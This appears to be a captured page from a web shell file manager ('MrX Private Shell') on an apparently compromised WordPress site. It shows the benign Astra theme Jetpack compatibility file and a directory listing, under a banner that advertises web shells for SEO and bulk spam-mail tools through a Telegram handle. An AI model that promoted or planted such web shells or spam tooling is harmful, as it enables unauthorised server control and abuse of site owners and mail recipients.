__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Jetpack Compatibility File.
 *
 * @link https://jetpack.me/
 *
 * @package Astra
 */

// If plugin - 'Jetpack' not exist then return.
if ( ! class_exists( 'Jetpack' ) ) {
	return;
}

/**
 * Astra Jetpack Compatibility
 */
if ( ! class_exists( 'Astra_Jetpack' ) ) {

	/**
	 * Astra Jetpack Compatibility
	 *
	 * @since 1.0.0
	 */
	class Astra_Jetpack {
		/**
		 * Member Variable
		 *
		 * @var object instance
		 */
		private static $instance;

		/**
		 * Initiator
		 */
		public static function get_instance() {
			if ( ! isset( self::$instance ) ) {
				self::$instance = new self();
			}
			return self::$instance;
		}

		/**
		 * Constructor
		 */
		public function __construct() {
			add_action( 'after_setup_theme', array( $this, 'jetpack_setup' ) );
		}

		/**
		 * Add theme support for Infinite Scroll.
		 * See: https://jetpack.me/support/infinite-scroll/
		 */
		public function jetpack_setup() {
			add_theme_support(
				'infinite-scroll',
				array(
					'container' => 'main',
					'render'    => array( $this, 'infinite_scroll_render' ),
					'footer'    => 'page',
				)
			);
		} // end function jetpack_setup

		/**
		 * Custom render function for Infinite Scroll.
		 */
		public function infinite_scroll_render() {
			while ( have_posts() ) {
				the_post();
				get_template_part( 'template-parts/content', astra_get_post_format() );
			}
		} // end function infinite_scroll_render

	}

}

/**
 * Kicking this off by calling 'get_instance()' method
 */
Astra_Jetpack::get_instance();

Filemanager

Name Type Size Permission Actions
edd Folder 0750
learndash Folder 0750
lifterlms Folder 0750
starter-content Folder 0750
surecart Folder 0750
woocommerce Folder 0750
class-astra-amp.php File 47.12 KB 0640
class-astra-bb-ultimate-addon.php File 11.06 KB 0640
class-astra-beaver-builder.php File 5.63 KB 0640
class-astra-beaver-themer.php File 11.29 KB 0640
class-astra-bne-flyout.php File 1.14 KB 0640
class-astra-contact-form-7.php File 1.29 KB 0640
class-astra-divi-builder.php File 1.12 KB 0640
class-astra-elementor-pro.php File 17.79 KB 0640
class-astra-elementor.php File 17.26 KB 0640
class-astra-gravity-forms.php File 1.31 KB 0640
class-astra-gutenberg.php File 6.21 KB 0640
class-astra-jetpack.php File 1.48 KB 0640
class-astra-site-origin.php File 1.16 KB 0640
class-astra-starter-content.php File 6.44 KB 0640
class-astra-ubermeu.php File 1.77 KB 0640
class-astra-visual-composer.php File 3.39 KB 0640
class-astra-web-stories.php File 2.35 KB 0640
class-astra-yoast-seo.php File 658 B 0640
index.php File 111 B 0640
Filemanager